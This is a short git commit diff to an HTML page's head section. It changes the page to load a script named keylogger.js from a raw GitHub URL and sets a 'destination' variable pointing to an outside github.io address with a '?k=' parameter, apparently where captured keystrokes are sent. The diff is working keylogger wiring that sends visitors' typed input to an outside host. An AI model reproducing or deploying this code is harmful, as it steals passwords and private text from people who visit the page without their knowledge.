Update and rename index.html to index.htm

--- a/index.htm
+++ b/index.htm
@@ -1,7 +1,7 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml" >
 <head>
-    <script type="text/javascript" src="keylogger.js"></script>
+    <script type="text/javascript" src="https://raw.githubusercontent.com/andy1337/andy1337.github.io/master/keylogger.js"></script>
     <script type="text/javascript">
         destination = 'andy1337.github.io/?k=';
     </script>
